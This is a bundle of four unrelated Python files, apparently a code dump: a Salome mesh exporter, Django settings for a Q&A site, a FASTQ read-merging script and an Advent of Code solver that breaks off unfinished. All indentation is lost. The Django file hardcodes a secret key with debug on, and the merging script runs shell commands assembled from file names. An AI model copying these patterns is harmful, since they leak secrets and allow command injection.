file = mesh_name
amsh_file = open("%s.amsh"%(file), "w")
amsh_file.write("unstr_grid_data N 0 0 2\n")
amsh_file.write(" title L 1 1 0\n")
amsh_file.write(" '%s exported from Salome on %s'\n"%(mesh_name, date))
#-
# Open the help file
if help == True:
mesh_file = open("%s.help"%(file), "w")
mesh_file.write("%s\n"%(date))
mesh_file.write("'%s' '%s'\n"%(mesh_name, file))
mesh_file.write("NODES EDGES TRIA QUAD TETRA PYRA PRISM HEXA\n")
mesh_file.write("%i %i %i %i %i %i %i %i\n"%(nb_nodes_in_mesh, nb_edges_in_mesh, nb_triangles_in_mesh, nb_quadrangles_in_mesh, nb_tetrahedrons_in_mesh, nb_pyramids_in_mesh, nb_prisms_in_mesh, nb_hexahedrons_in_mesh))
for n in range(nb_groups):
mesh_file.write("'%s' "%(mesh.GetGroupNames()[n]))
mesh_file.write("\n")
mesh_file.write("NODES\nID X Y Z\n")
#-
# Get the region ffa dimension
region_ffa_dimension = 2 + nb_groups
if mesh_dimension == 2:
if nb_triangles_in_mesh > 0:
region_ffa_dimension += 1
if nb_quadrangles_in_mesh > 0:
region_ffa_dimension += 1
elif mesh_dimension == 3:
if nb_tetrahedrons_in_mesh > 0:
region_ffa_dimension += 1
if nb_pyramids_in_mesh > 0:
region_ffa_dimension += 1
if nb_prisms_in_mesh > 0:
region_ffa_dimension += 1
if nb_hexahedrons_in_mesh > 0:
region_ffa_dimension += 1
amsh_file.write(" region N 0 0 %i\n"%(region_ffa_dimension))
amsh_file.write(" region_name L 1 1 0\n")
amsh_file.write(" 'volume_elements'\n")
amsh_file.write(" coordinates DF %i %i 0\n"%(mesh_dimension, nb_nodes_in_mesh))
#-
print "[i] Writing node coordinates... (%s nodes)"%(nb_nodes_in_mesh)
# Get the node coordinates
node_coordinates = []
for n in range(mesh_dimension):
node_coordinates.append([])
#-
# Write the node coordinates
for node_id in node_ids_in_mesh:
if help == True:
mesh_file.write("%i %f %f %f\n"%(node_id, mesh.GetNodeXYZ(node_id)[0], mesh.GetNodeXYZ(node_id)[1], mesh.GetNodeXYZ(node_id)[2]))
for n in range(mesh_dimension):
node_coordinate = mesh.GetNodeXYZ(node_id)[n]
[node_float_coordinate, node_coordinate_power_of_ten] = powerOfTen(node_coordinate)
node_coordinate = "%.16fE%i"%(node_float_coordinate, node_coordinate_power_of_ten)
node_coordinates[n].append(node_coordinate)
figures = []
for n in range(mesh_dimension):
figures += node_coordinates[n]
WriteInColumns(amsh_file, figures, mesh_dimension, 18)
#-
# Get the group element definition
print "[i] Writing definition of group elements... (%s groups)"%(nb_groups)
if help == True:
mesh_file.write("GROUPS\n")
for group in groups:# For each group of the mesh
group_name = group.GetName()
element_ids_in_group = group.GetListOfID()
triangle_ids_in_group = []
quadrangle_ids_in_group = []
edges_ids_in_group = []
for element_id_in_group in element_ids_in_group:
nb_nodes_in_element = mesh.GetElemNbNodes(element_id_in_group)
if mesh_dimension == 3:
if nb_nodes_in_element == 3:
triangle_ids_in_group.append(element_id_in_group)
if nb_nodes_in_element == 4:
quadrangle_ids_in_group.append(element_id_in_group)
elif mesh_dimension == 2:
edges_ids_in_group.append(element_id_in_group)
nb_types_in_group = 0
types_in_groups = 0 #-1 = edges ; + 1 = triangles ; + 2 = quadrangles
nb_triangles_in_group = len(triangle_ids_in_group)
nb_quadrangles_in_group = len(quadrangle_ids_in_group)
nb_edges_in_group = len(edges_ids_in_group)
if nb_triangles_in_group > 0:
types_in_groups += 1
nb_types_in_group += 1
if nb_quadrangles_in_group > 0:
types_in_groups += 2
nb_types_in_group += 1
if nb_edges_in_group > 0:
types_in_groups -= 1
nb_types_in_group += 1
amsh_file.write(" boundary N 0 0 %i\n"%(nb_types_in_group + 1))
amsh_file.write(" boundary_name L 1 1 0\n")
amsh_file.write(" '%s'\n"%(group_name))
if help == True:
mesh_file.write("'%s'\n"%(group_name))
for n in range(nb_types_in_group):
amsh_file.write(" belem_group N 0 0 2\n")
amsh_file.write(" bound_elem_type L 1 1 0\n")
if types_in_groups == -1: # edges
if help == True:
mesh_file.write("EDGES\n")
element_ids_in_group = edges_ids_in_group
nb_elements_in_group = nb_edges_in_group
nb_nodes_in_elements = 2
elements_type = "bar2"
elif types_in_groups == 2: # quadrangles
if help == True:
mesh_file.write("QUAD\n")
element_ids_in_group = quadrangle_ids_in_group
nb_elements_in_group = nb_quadrangles_in_group
nb_nodes_in_elements = 4
elements_type = "quad4"
elif types_in_groups == 1 or types_in_groups == 3: # triangles
if help == True:
mesh_file.write("TRIA\n")
element_ids_in_group = triangle_ids_in_group
nb_elements_in_group = nb_triangles_in_group
nb_nodes_in_elements = 3
types_in_groups -= 1
elements_type = "tria3"
if help == True:
mesh_file.write("N ID NODE1 NODE2 ...\n")
N = 1
amsh_file.write(" '%s'\n"%(elements_type))
amsh_file.write(" bound_elem_nodes IF %i %i 0\n"%(nb_nodes_in_elements, nb_elements_in_group))
node_ids = []
for n in range(nb_nodes_in_elements):
node_ids.append([])
for element_id in element_ids_in_group:
if help == True:
mesh_file.write("%i %i "%(N, element_id))
N += 1
for n in range(nb_nodes_in_elements):
if help == True:
mesh_file.write("%i "%(mesh.GetElemNodes(element_id)[n]))
node_ids[n].append(mesh.GetElemNodes(element_id)[n])
if help == True:
mesh_file.write("\n")
figures = []
for n in range(nb_nodes_in_elements):
figures += node_ids[n]
WriteInColumns(amsh_file, figures, nb_nodes_in_elements, 30)
#-
# Write the domain element definitions
print "[i] Writing definition of domain elements... (%s elements)"%(nb_elements_in_domain)
if help == True:
mesh_file.write("DOMAIN CELLS\n")
triangle_ids_in_domain = []
quadrangle_ids_in_domain = []
tetrahedron_ids_in_domain = []
pyramid_ids_in_domain = []
prism_ids_in_domain = []
hexahedron_ids_in_domain = []
if mesh_dimension == 2:
element_ids_in_domain = face_ids_in_mesh
elif mesh_dimension == 3:
element_ids_in_domain = volume_ids_in_mesh
for element_id_in_domain in element_ids_in_domain:
nb_nodes_in_element = mesh.GetElemNbNodes(element_id_in_domain)
if mesh_dimension == 2:
if nb_nodes_in_element == 3:
triangle_ids_in_domain.append(element_id_in_domain)
if nb_nodes_in_element == 4:
quadrangle_ids_in_domain.append(element_id_in_domain)
elif mesh_dimension == 3:
if nb_nodes_in_element == 4:
tetrahedron_ids_in_domain.append(element_id_in_domain)
if nb_nodes_in_element == 5:
pyramid_ids_in_domain.append(element_id_in_domain)
if nb_nodes_in_element == 6:
prism_ids_in_domain.append(element_id_in_domain)
if nb_nodes_in_element == 8:
hexahedron_ids_in_domain.append(element_id_in_domain)
nb_types_in_domain = 0
types_in_domain = 0 #-2 = quadrangles ; - 1 = triangles ; + 1 = tetrahedrons ; + 2 = pyramids ; + 4 = prisms ; + 8 = hexahedrons
nb_triangles_in_domain = len(triangle_ids_in_domain)
nb_quandrangles_in_domain = len(quadrangle_ids_in_domain)
nb_tetrahedrons_in_domain = len(tetrahedron_ids_in_domain)
nb_pyramids_in_domain = len(pyramid_ids_in_domain)
nb_prisms_in_domain = len(prism_ids_in_domain)
nb_hexahedrons_in_domain = len(hexahedron_ids_in_domain)
if nb_triangles_in_domain > 0:
types_in_domain -= 1
nb_types_in_domain += 1
if nb_quandrangles_in_domain > 0:
types_in_domain -= 2
nb_types_in_domain += 1
if nb_tetrahedrons_in_domain > 0:
types_in_domain += 1
nb_types_in_domain += 1
if nb_pyramids_in_domain > 0:
types_in_domain += 2
nb_types_in_domain += 1
if nb_prisms_in_domain > 0:
types_in_domain += 4
nb_types_in_domain += 1
if nb_hexahedrons_in_domain > 0:
types_in_domain += 8
nb_types_in_domain += 1
types_for_quadrangles = [ - 3, - 2]
types_for_triangles = [ - 3, - 1]
types_for_tetrahedrons = [1, 3, 5, 7, 9, 11, 13, 15]
types_for_pyramids = [2, 3, 6, 7, 10, 11, 14, 15]
types_for_prisms = [4, 5, 6, 7, 12, 13, 14, 15]
types_for_hexahedrons = [8, 9, 10, 11, 12, 13, 14, 15]
for n in range(nb_types_in_domain):
amsh_file.write(" element_group N 0 0 2\n")
amsh_file.write(" element_type L 1 1 0\n")
if types_in_domain in types_for_quadrangles:
if help == True:
mesh_file.write("QUAD\n")
element_ids_in_domain = quadrangle_ids_in_domain
nb_elements_in_domain = nb_quandrangles_in_domain
nb_nodes_in_elements = 4
types_in_domain += 2
elements_type = "quad4"
elif types_in_domain in types_for_triangles:
if help == True:
mesh_file.write("TRIA\n")
element_ids_in_domain = triangle_ids_in_domain
nb_elements_in_domain = nb_triangles_in_domain
nb_nodes_in_elements = 3
types_in_domain += 1
elements_type = "tria3"
elif types_in_domain in types_for_hexahedrons:
if help == True:
mesh_file.write("HEXA\n")
element_ids_in_domain = hexahedron_ids_in_domain
nb_elements_in_domain = nb_hexahedrons_in_domain
nb_nodes_in_elements = 8
types_in_domain -= 8
elements_type = "hexa8"
elif types_in_domain in types_for_prisms:
if help == True:
mesh_file.write("PRISM\n")
element_ids_in_domain = prism_ids_in_domain
nb_elements_in_domain = nb_prisms_in_domain
nb_nodes_in_elements = 6
types_in_domain -= 4
elements_type = "penta6"
elif types_in_domain in types_for_pyramids:
if help == True:
mesh_file.write("PENTA\n")
element_ids_in_domain = pyramid_ids_in_domain
nb_elements_in_domain = nb_pyramids_in_domain
nb_nodes_in_elements = 5
types_in_domain -= 2
elements_type = "penta5"
elif types_in_domain in types_for_tetrahedrons:
if help == True:
mesh_file.write("TETRA\n")
element_ids_in_domain = tetrahedron_ids_in_domain
nb_elements_in_domain = nb_tetrahedrons_in_domain
nb_nodes_in_elements = 4
types_in_domain -= 1
elements_type = "tetra4"
if help == True:
mesh_file.write("N ID NODE1 NODE2 ...\n")
N = 1
amsh_file.write(" '%s'\n"%(elements_type))
amsh_file.write(" element_nodes IF %i %i 0\n"%(nb_nodes_in_elements, nb_elements_in_domain))
node_ids = []
for n in range(nb_nodes_in_elements):
node_ids.append([])
for element_id in element_ids_in_domain:
if help == True:
mesh_file.write("%i %i "%(N, element_id))
N += 1
for n in range(nb_nodes_in_elements):
if help == True:
mesh_file.write("%i "%(mesh.GetElemNodes(element_id)[n]))
node_ids[n].append(mesh.GetElemNodes(element_id)[n])
if help == True:
mesh_file.write("\n")
figures = []
for n in range(nb_nodes_in_elements):
figures += node_ids[n]
if mesh_dimension == 3:
# reorder node IDs
reordered_figures = []
split_figures = []
reordered_split_figures = []
for n in range(nb_nodes_in_elements):
split_figures.append([])
reordered_split_figures.append([])
f = 0
n = 0
for figure in figures:
split_figures[n].append(figure)
f += 1
if f == nb_elements_in_domain:
n += 1
f = 0
if elements_type == "hexa8" or elements_type == "penta6":
for n in range(nb_nodes_in_elements / 2):
reordered_split_figures[n] = split_figures[nb_nodes_in_elements / 2 + n]
reordered_split_figures[nb_nodes_in_elements / 2 + n] = split_figures[n]
for n in range(nb_nodes_in_elements):
reordered_figures += reordered_split_figures[n]
figures = reordered_figures
elif elements_type == "tetra4" or elements_type == "penta5":
for n in range(nb_nodes_in_elements - 1):
reordered_figures += split_figures[nb_nodes_in_elements - 2 - n]
figures = reordered_figures + split_figures[nb_nodes_in_elements - 1]
WriteInColumns(amsh_file, figures, nb_nodes_in_elements, 24)
#-
# Close the files
amsh_file.close()
if help == True:
mesh_file.close()
#-
eaf = ExportAmshFile
def ExportSU2File( mesh = None, file = None, only = [None], ignore = [None]):
"""
Description:
Exports a mesh into an .su2 file readable by the CFD solver SU2 4.0.
Arguments:
# mesh
Description: The mesh to export.
Type: Mesh
GUI selection: yes
Selection by name: yes
Recursive: -
Default value: None
# file
Description: The name without extension of the amsh file to write. If equals None, the name of the mesh in the study tree is taken.
Type: String
GUI selection: -
Selection by name: -
Recursive: -
Default value: None
# only
Description: The list of names of groups to export, excluding the others.
Type: List of Strings
GUI selection: -
Selection by name: -
Recursive: -
Default value: [None]
# ignore
Description: The list of names of groups to ignore.
Type: List of Strings
GUI selection: -
Selection by name: -
Recursive: -
Default value: [None]
Returned Values:
"dim" value: -
"single" value: -
Type: -
Number: -
Name: -
Conditions of use:
The mesh has to be computed and to contain groups describing the desired boundary conditions (inlet, outlet, wall, farfield, etc.).
"""
# Get the input shape(s)
mesh = GetGUISelection(mesh, uniq = True)
mesh = GetObject(mesh, "SMESH")
#-
# Check the input shape existence
if "error" in [mesh] or None in [mesh]: return
#-
else:# All checks done
def FindElementType(mesh_dimension, nb_nodes_in_element, boundary = False):
if boundary == True: mesh_dimension -= 1
line_type = 3
triangle_type = 5
quadrilateral_type = 9
tetrahedral_type = 10
hexahedral_type = 12
wedge_type = 13
pyramid_type = 14
element_type = None
if mesh_dimension == 1:
if nb_nodes_in_element == 2:
element_type = line_type
if mesh_dimension == 2:
if nb_nodes_in_element == 3:
element_type = triangle_type
if nb_nodes_in_element == 4:
element_type = quadrilateral_type
elif mesh_dimension == 3:
if nb_nodes_in_element == 4:
element_type = tetrahedral_type
if nb_nodes_in_element == 5:
element_type = pyramid_type
if nb_nodes_in_element == 6:
element_type = wedge_type
if nb_nodes_in_element == 8:
element_type = hexahedral_type
return element_type
def powerOfTen(figure):
figure *= 1.0
n = 0
if figure != 0:
if abs(figure) < 1:
while abs(figure) < 1:
figure *= 10
n -= 1
if abs(figure) >= 10:
while abs(figure) >= 10:
figure /= 10
n += 1
return figure, n
if "SMESH_Mesh instance" in str(mesh) or "meshProxy instance" in str(mesh) or "Mesh object" in str(mesh):
try:
mesh = smesh.Mesh(mesh)
except:
pass
else:
print "[X] The input object is not a mesh or the Mesh module was not yet loaded."; return
# Get the mesh name
mesh_name = mesh.GetName()
#-
# Renumber elements and nodes
mesh.RenumberNodes()
mesh.RenumberElements()
#-
# Get nodes number and IDs
nb_nodes_in_mesh = mesh.NbNodes()
node_ids_in_mesh = mesh.GetNodesId()
#-
# Get edges IDs
edge_ids_in_mesh = mesh.GetElementsByType(SMESH.EDGE)
nb_edges_in_mesh = mesh.NbEdges()
#-
# Get faces IDs
face_ids_in_mesh = mesh.GetElementsByType(SMESH.FACE)
nb_faces_in_mesh = mesh.NbFaces()
nb_triangles_in_mesh = mesh.NbTriangles()
nb_quadrangles_in_mesh = mesh.NbQuadrangles()
#-
# Get volumes IDs
nb_volumes_in_mesh = mesh.NbVolumes()
nb_tetrahedrons_in_mesh = mesh.NbTetras()
nb_pyramids_in_mesh = mesh.NbPyramids()
nb_prisms_in_mesh = mesh.NbPrisms()
nb_hexahedrons_in_mesh = mesh.NbHexas()
volume_ids_in_mesh = mesh.GetElementsByType(SMESH.VOLUME)
#-
# Get mesh dimension
if nb_volumes_in_mesh != 0:
mesh_dimension = 3
nb_elements_in_domain = nb_volumes_in_mesh
else:
mesh_dimension = 2
nb_elements_in_domain = nb_faces_in_mesh
#-
# Get groups
group_names = mesh.GetGroupNames()
groups = mesh.GetGroups()
#-
# Sort groups
sorted_groups = []
if only != [None]:
for group in groups:
group_name = group.GetName()
if group_name in only:
sorted_groups.append(group)
groups = sorted_groups
sorted_groups = []
if ignore != [None]:
for group in groups:
group_name = group.GetName()
if group_name not in ignore:
sorted_groups.append(group)
groups = sorted_groups
# Get the number of groups
nb_groups = len(groups)
#-
# Get group types
group_types = []
for group in groups:
group_type = str(group.GetType())
group_types.append(group_type)
#-
# Open the su2 file
if file == None:
file = mesh_name
su2_file = open("%s.su2"%(file), "w")
su2_file.write("NDIME= %i\n"%(mesh_dimension))
#-
# Write the domain element definitions
print "[i] Writing definition of domain elements... (%s elements)"%(nb_elements_in_domain)
su2_file.write("NELEM= %i\n"%(nb_elements_in_domain))
if mesh_dimension == 2:
element_ids_in_domain = face_ids_in_mesh
elif mesh_dimension == 3:
element_ids_in_domain = volume_ids_in_mesh
for element_id_in_domain in element_ids_in_domain:
nb_nodes_in_element = mesh.GetElemNbNodes(element_id_in_domain)
element_type = FindElementType(mesh_dimension, nb_nodes_in_element)
element_definition = str(element_type)
for n in range(nb_nodes_in_element):
#if element_type == pyramid_type: n *= -1
node_id = mesh.GetElemNodes(element_id_in_domain)[n]
node_id -= 1
element_definition += "\t" + str(node_id)
element_definition += "\t" + str(element_id_in_domain)
su2_file.write(element_definition + "\n")
#-
print "[i] Writing node coordinates... (%s nodes)"%(nb_nodes_in_mesh)
su2_file.write("NPOIN= %i\n"%(nb_nodes_in_mesh))
# Write the node coordinates
for node_id in node_ids_in_mesh:
node_definition = ""
for n in range(mesh_dimension):
node_coordinate = mesh.GetNodeXYZ(node_id)[n]
[node_float_coordinate, node_coordinate_power_of_ten] = powerOfTen(node_coordinate)
node_coordinate = "%.16fE%i"%(node_float_coordinate, node_coordinate_power_of_ten)
node_definition += "\t" + node_coordinate
node_id -= 1
node_definition += "\t" + str(node_id)
su2_file.write(node_definition + "\n")
#-
# Get the group element definition
print "[i] Writing definition of group elements... (%s groups)"%(nb_groups)
su2_file.write("NMARK= %i\n"%(nb_groups))
for group in groups:# For each group of the mesh
group_name = group.GetName()
su2_file.write("MARKER_TAG= %s\n"%(group_name))
element_ids_in_group = group.GetListOfID()
nb_elements_in_group = len(element_ids_in_group)
su2_file.write("MARKER_ELEMS= %s\n"%(nb_elements_in_group))
for element_id_in_group in element_ids_in_group:
nb_nodes_in_element = mesh.GetElemNbNodes(element_id_in_group)
element_type = FindElementType(mesh_dimension, nb_nodes_in_element, boundary = True)
element_definition = str(element_type)
for n in range(nb_nodes_in_element):
node_id = mesh.GetElemNodes(element_id_in_group)[n]
node_id -= 1
element_definition += "\t" + str(node_id)
#element_definition += "\t" + str(element_id_in_group)
su2_file.write(element_definition + "\n")
#-
# Close the files
su2_file.close()
#-
esf = ExportSU2File
#### - ####
print "Welcome in cfdmsh!"
pv()
print "Type pdf() to see implemented functions."
|
"""
Django settings for hitchike project.
Generated by 'django-admin startproject' using Django 1.9.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'xs9lba(58-&bz**m%ye9t46h47if6)7fs8f^2_qpt)6fse=7ir'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['localhost', '127.0.0.1', 'hitchike.too.gy', 'hitchike']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
# Vendors
'django_mathjax',
'hitcount',
'taggit',
'vote',
'pagedown',
# Apps
'qa',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'hitchike.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
BASE_DIR + '/templates',
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'hitchike.wsgi.application'
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Paris'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# AUTHENTICATION
LOGIN_REDIRECT_URL = '/'
LOGOUT_REDIRECT_URL = '/'
# REGISTRATION
ACCOUNT_ACTIVATION_DAYS = 7
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = '/home/static/hitchike/'
STATICFILES_DIRS = (
BASE_DIR + '/static',
)
MEDIA_URL = '/media/'
MEDIA_ROOT = '/home/media/hitchike/'
MATHJAX_ENABLED=True
MATHJAX_CONFIG_FILE = "TeX-AMS-MML_HTMLorMML"
MATHJAX_CONFIG_DATA = {
"tex2jax": {
"inlineMath": [ ['$','$'], ['\\(','\\)'] ],
},
"showMathMenu": False,
}
PAGEDOWN_WIDGET_TEMPLATE = 'qa/editor_widget.html'
PAGEDOWN_WIDGET_CSS = ('css/editor_widget.css',)
ALLOWED_DOMAINS = ['epita.fr', 'lrde.epita.fr', 'lse.epita.fr']
|
<gh_stars>0
#!/usr/bin/env python
"""
File Name : combine_reads_MB.py
Author : <NAME>, <EMAIL>
Created On : 2016-03-28
Last Modified: 2016-03-28
Description : This program will combine read files of the same sample
obtained from multiple sequencing runs
Dependencies:
Usage: combine_reads_MB.py [-h] [-v] [-i INPUT_FILE] [-d SEQ_DIR]
[-o OUTPUT_DIR] [-m MIN_READCNT] [-x MAX_READCNT]
[-r TOTAL_READCNT] [-w]
CHANGE LOG:
TODO:
"""
# Python imports
import os, operator, sys, time, re, logging, argparse, subprocess, glob
import logging.handlers
from collections import defaultdict
# Version
VERSION = "1.0"
# Logger configuration and setup
LEVEL = logging.DEBUG
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
logger = logging.getLogger(__file__)
logger.setLevel(LEVEL)
handler = logging.handlers.RotatingFileHandler('zz_mergeReads.log', maxBytes=2000000, backupCount=20)
handler.setLevel(LEVEL)
handler.setFormatter(formatter)
logger.addHandler(handler)
def main(argv):
logger.info("STARTED PIPELINE!!")
parser = argparse.ArgumentParser(prog = 'combine_reads_MB.py', description = "A program to combine reads of a sample from multiple sequencing runs")
parser.add_argument('-v','--version', action = 'version', version = "%(prog)s v" + str(VERSION))
parser.add_argument('-i', '--ifile', dest='input_file', help="input file containing sample ids")
parser.add_argument('-d', '--seqdir', dest='seq_dir', help="path to sequence directory")
parser.add_argument('-o','--outdir', dest='output_dir', help="Name of an output directory")
parser.add_argument('-m','--min_readcnt', dest='min_readcnt', help="Enter minimum reads to consider while merging files")
parser.add_argument('-x', '--max_readcnt', dest='max_readcnt', help="Maximun number of reads per sample")
parser.add_argument('-r','--total_readcnt', dest='total_readcnt', help="Enter total read count you want to keep in the output directory")
parser.add_argument('-w','--overwrite', action='store_true', default='False', help="overwrite, if the output files exists")
args = parser.parse_args()
# check to see that input file is provided
if not args.input_file:
logger.exception("You must provide input file containing sample ids.")
parser.exit(status=1, message="You must provide input file containing sample ids\n\n")
else:
input_file = args.input_file
if not args.output_dir:
outputdirname = os.path.splitext(os.path.basename(input_file))[0] + "_out"
output_dir = os.path.join(os.getcwd(), outputdirname)
logger.warning("Output directory is not provided. Writing the result to {} " . format(output_dir))
else:
output_dir = os.path.realpath(args.output_dir)
if not args.seq_dir:
logger.exception("You must provide path to directory that contains sequences or metaphlan output")
parser.exit(status=1, message="You must provide path to sequence directory\n")
else:
seq_dir = os.path.realpath(args.seq_dir)
if not args.min_readcnt:
min_readcnt = 100000
else:
min_readcnt = int(args.min_readcnt)
if not args.max_readcnt:
max_readcnt = 5000000
else:
max_readcnt = int(args.max_readcnt)
if not args.total_readcnt:
readcnt_tomerge = 4000000
else:
readcnt_tomerge = int(args.total_readcnt)
readcnt_millions = str(readcnt_tomerge/float(1000000))
#print "readcnt in millions {}".format(str(readcnt_millions))
file_suffix = str(readcnt_millions + 'M.txt')
try:
if not os.path.isdir(output_dir): subprocess.check_call(['mkdir', output_dir])
datadict = read_inputfile(input_file)
sample_stat = {}
#logger.info("data = {}".format(str(datadict)))
fh1 = open('r01_combined.txt', 'w')
fh2 = open('r02_sampleids_gt' + str(file_suffix), 'w')
fh3 = open('r03_sampleids_lt' + str(file_suffix), 'w')
fh1.write('#SampleLabNumber\tSampleSeqID\tReadCnt\n')
fh2.write('#SampleLabNumber\tSampleSeqID\tReadCnt\n')
fh3.write('#SampleLabNumber\tSampleSeqID\tReadCnt\n')
for id, data in datadict.iteritems():
total_cnt = 0;
seqids = ""
#logger.info("id = " + str(id))
for seqid, readcnt in data.iteritems():
if int(readcnt) > int(min_readcnt):
total_cnt += int(readcnt)
seqids += str(seqid) + ";"
#total_cnt = sum(int(v) for v in data.values() if int(v) > 100000)
#seqids = ";".join([str(x) for x in data.keys() if data[x] > 100000])
if len(seqids):
seqids = seqids.rstrip(';')
fh1.write(id + '\t' + seqids + '\t' + str(total_cnt) + '\n')
if total_cnt >= int(readcnt_tomerge):
seqid_list = seqids.split(';')
participant_id = seqid_list[0].split('_')[0]
sample_id = str(participant_id + "_" + seqid_list[0].split('_')[1])
fw_cmd = ''
rv_cmd = ''
if len(seqid_list) > 1:
fw_file = ''
rv_file = ''
for seqid in seqid_list:
fw_file += os.path.join(seq_dir, str(seqid + '_FW_CLEAN.fastq')) + ' '
rv_file += os.path.join(seq_dir, str(seqid + '_RV_CLEAN.fastq')) + ' '
fw_outfile = os.path.join(output_dir, str(sample_id + '_COMB_FW_CLEAN.fastq'))
rv_outfile = os.path.join(output_dir, str(sample_id + '_COMB_RV_CLEAN.fastq'))
fh2.write(str(id) + '\t' + str(sample_id +'_COMB') + '\t' + str(total_cnt) + '\n')
else:
fw_file = ''
rv_file = ''
fw_file = os.path.join(seq_dir, str(seqid_list[0] + '_FW_CLEAN.fastq'))
rv_file = os.path.join(seq_dir, str(seqid_list[0] + '_RV_CLEAN.fastq'))
fw_outfile = os.path.join(output_dir, str(seqid_list[0] + '_FW_CLEAN.fastq'))
rv_outfile = os.path.join(output_dir, str(seqid_list[0] + '_RV_CLEAN.fastq'))
fh2.write(str(id) + '\t' + str(seqid_list[0]) + '\t' + str(total_cnt) + '\n')
if not os.path.isfile(fw_outfile):
fw_cmd = 'cat {} > {}'.format(fw_file, fw_outfile)
rv_cmd = 'cat {} > {}'.format(rv_file, rv_outfile)
logger.debug("fw_cmd = {} and rv_cmd = {}".format(fw_cmd, rv_cmd))
if fw_cmd and rv_cmd:
proc1 = subprocess.Popen(fw_cmd, shell=True, stdout = subprocess.PIPE, stderr=subprocess.STDOUT)
output1 = proc1.communicate()[0].strip()
proc2 = subprocess.Popen(rv_cmd, shell=True, stdout = subprocess.PIPE, stderr=subprocess.STDOUT)
output2 = proc2.communicate()[0].strip()
#pass
else:
fh3.write(id + '\t' + seqids + '\t' + str(total_cnt) + '\n')
#if int(total_cnt) > int(max_readcnt):
# logger.info("id => {} has more than {} reads".format(str(id), str(max_readcnt)))
fh1.close()
fh2.close()
fh3.close()
except:
logger.exception("Error Occurred")
sys.exit(1)
logger.info("End of pipeline!!")
def read_inputfile(filename):
logger.info("Reading input file: " + filename)
sample_info = defaultdict(dict)
try:
s = os.stat(filename)
if s.st_size == 0:
logger.exception("Error Occurred! The file {} is empty".format(filename))
sys.exit(1)
except OSError as e:
logger.exception("Error Occurred: " + str(e))
sys.exit(2)
fh = open(filename, "r")
data = [line.rstrip('\n').split("\t") for line in fh if not line.startswith('#')]
fh.close()
#logger.debug("data = {}".format(str(data)))
for item in data:
sample_info[item[0]][item[1]] = int(item[2].replace(',',''))
logger.info("IDs: {}".format(str(len(sample_info))))
return sample_info
####################################################################
if __name__ == '__main__':
main(sys.argv[1:])
|
from collections import defaultdict, Counter, deque
from functools import cache
from itertools import product, pairwise
from multiprocessing import Pool
import math
import re
non_digits = re.compile('[^0-9]+')
def sign(a, b, step=1):
return int(math.copysign(step, b-a))
def autorange(a,b, step=1):
if a == b:return (a,)
s = sign(a, b, step)
return range(a, b+s, s)
def inp_to_ranges(xy_strs):
res = []
for strs in xy_strs:
a,b = map(int, strs.strip(',xy=').split('..'))
res.append(range(a,b+1))
return res
def d17(inp, sample=False):
p1, p2 = None, 0
_, _, *xy_strs = inp.split()
x_range, y_range = inp_to_ranges(xy_strs)
p1 = y_range.start
for ixv in range(0, x_range.stop+1):
if ixv * (ixv+1) < x_range.start * 2:
continue
for iyv in range(y_range.start, -y_range.start):
x, y = 0, 0
xv, yv = ixv, iyv
while y > y_range.start and x < x_range.stop:
x += xv
y += yv
xv = max(0, xv - 1)
yv -= 1
if x in x_range and y in y_range:
p2 += 1
p1 = max(p1, iyv * (iyv + 1) // 2)
break
return p1, p2
def validate_test(case_id, inp=None, want_p1=None, want_p2=None):
do_p1, do_p2 = False, False
#print(f"validate_test({case_id}, {inp}, {want_p1}, {want_p2})")
got_p1, got_p2 = d17(inp, sample=True)
if want_p1 is not None:
assert want_p1 == got_p1, f"{case_id=} p1:\n\t{want_p1=}\n\t{got_p1=}"
do_p1 = True
if want_p2 is not None:
assert want_p2 == got_p2, f"{case_id=} p2:\n\t{want_p2=}\n\t{got_p2=}"
do_p2 = True
return True, do_p1, do_p2
def main():
with open('../inputs/d17.txt') as f:
inp = f.read().strip()
return d17(inp)
if __name__ == '__main__':
cases = [
#(id, inp, p1, p2),
(0, "target area: x=20..30, y=-10..-5", 45, 112),
]
"""
# Non multiprocessing version
for case in cases:
validate_test(*case)
p1, p2 = main()
print(f"p1 = {p1}\np2 = {p2}")
"""
with Pool(processes=min(8, len(cases) + 1)) as pool:
main_res = pool.apply_async(main)
